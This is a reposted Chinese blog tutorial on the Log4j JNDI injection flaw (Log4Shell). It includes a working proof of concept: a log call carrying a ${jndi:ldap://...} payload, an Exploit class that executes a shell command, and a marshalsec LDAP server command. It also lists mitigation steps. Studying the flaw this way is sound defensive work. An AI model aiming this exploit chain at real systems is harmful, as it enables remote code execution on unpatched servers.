来源：https://blog.csdn.net/qq_40989258/article/details/121862363

| 简介

| 漏洞概述

| 影响范围

Apache Log4j 2.x <= 2.15.0-rc1

| 环境搭建

<dependency>
    <groupId>org.apache.logging.log4jgroupId>
    <artifactId>log4j-coreartifactId>
    <version>2.14.1version>
dependency>

| 漏洞利用

1 使用POC测试

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
class LogTest {
    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

首先新建exp.java，然后编译为class文件。

class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}

javac exp.java

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://127.0.0.1:7777/#Exploit" 8888

https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2

| 修复方式

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

• 添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true；
• 在应用classpath下添加log4j2.component.properties配置文件，文件内容为log4j2.formatMsgNoLookups=true；
• JDK使用11.0.1、8u191、7u201、6u211及以上的高版本；

• 部署使用第三方防火墙产品进行安全防护。

推荐阅读

一键生成Springboot & Vue项目！【毕设神器】
Java可视化编程工具系列（一）
Java可视化编程工具系列（二）

顺便给大家推荐一个GitHub项目，这个 GitHub 整理了上千本常用技术PDF，绝大部分核心的技术书籍都可以在这里找到，
GitHub地址：https://github.com/javadevbooks/books
Gitee地址：https://gitee.com/javadevbooks/books
电子书已经更新好了，你们需要的可以自行下载了，记得点一个star，持续更新中..